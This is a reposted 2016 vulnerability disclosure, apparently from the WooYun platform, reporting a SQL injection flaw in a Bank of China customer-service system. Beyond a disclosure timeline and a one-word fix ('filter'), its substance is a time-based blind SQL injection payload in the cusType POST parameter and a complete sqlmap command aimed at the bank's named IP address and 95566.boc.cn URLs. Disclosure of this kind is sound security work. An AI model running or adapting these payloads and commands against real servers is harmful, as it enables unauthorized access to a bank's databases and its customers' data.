神刀安全网

漏洞标题: 中国银行某系统存在SQL注入漏洞

漏洞详情

披露状态:

2016-04-15: 细节已通知厂商并且等待厂商处理中
2016-04-18: 厂商已经确认,细节仅向厂商公开
2016-04-28: 细节向核心白帽子及相关领域专家公开
2016-05-08: 细节向普通白帽子公开
2016-05-18: 细节向实习白帽子公开
2016-06-02: 细节向公众公开

简要描述:

中国银行某系统存在SQL注入漏洞

详细说明:

#1 影响服务器

https://219.141.191.165/IMRINFO/AT/ZIMComm

https://95566.boc.cn/IMRINFO/AT/ZIMComm

https://95566.boc.cn/ZIM/IMRINFO/AT/ZIMComm

#2 注入点,POST

code 区域
action=ZING_MSG_SESSION_INFO&cusType=%E6%99%AE%E9%80%9A%E5%AE%A2%E6%88%B7' AND (SELECT * FROM (SELECT(SLEEP(5)))oLEQ) AND 'LNdX'='LNdX&MYD=%E6%9C%AA%E8%AF%84%E4%BB%B7&MYD2=%E6%9C%AA%E8%AF%84%E4%BB%B7&allSelMenuStr=%E4%B8%AA%E4%BA%BA%E9%87%91%E8%9E%8D%E4%B8%9A%E5%8A%A1#&BotTalkCount=0&solvePerd=0&businessPerd=0.829&queuePeriod=0&talkPeriod=0&cookie=&area=%E5%AE%81%E6%B3%A2&IMRBeginTime=1460637371131&inboundTime=1460637370974&ip=21.123.23.233&colineNo=22451770400000&coJid=22451770400000&BotBeginTime=1460637370974&businessType1=%E4%B8%AA%E4%BA%BA%E9%87%91%E8%9E%8D%E4%B8%9A%E5%8A%A1&endTime=1460637371803

注入参数:cusType

code 区域
python sqlmap.py -u "https://219.141.191.165/IMRINFO/AT/ZIMComm" —data="action=ZING_MSG_SESSION_INFO&cusType=%E6%99%AE%E9%80%9A%E5%AE%A2%E6%88%B7*&MYD=%E6%9C%AA%E8%AF%84%E4%BB%B7&MYD2=%E6%9C%AA%E8%AF%84%E4%BB%B7&allSelMenuStr=%E4%B8%AA%E4%BA%BA%E9%87%91%E8%9E%8D%E4%B8%9A%E5%8A%A1#&BotTalkCount=0&solvePerd=0&businessPerd=0.829&queuePeriod=0&talkPeriod=0&cookie=&area=%E5%AE%81%E6%B3%A2&IMRBeginTime=1460637371131&inboundTime=1460637370974&ip=21.123.23.233&colineNo=22451770400000&coJid=22451770400000&BotBeginTime=1460637370974&businessType1=%E4%B8%AA%E4%BA%BA%E9%87%91%E8%9E%8D%E4%B8%9A%E5%8A%A1&endTime=1460637371803" —technique=T —dbms=mysql –time-sec=3

漏洞证明:

漏洞标题:  中国银行某系统存在SQL注入漏洞

修复方案:

# 过滤

版权声明:转载请注明来源 猪猪侠@乌云

转载本站任何文章请注明:转载至神刀安全网,谢谢神刀安全网 » 漏洞标题: 中国银行某系统存在SQL注入漏洞

分享到:更多 ()

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址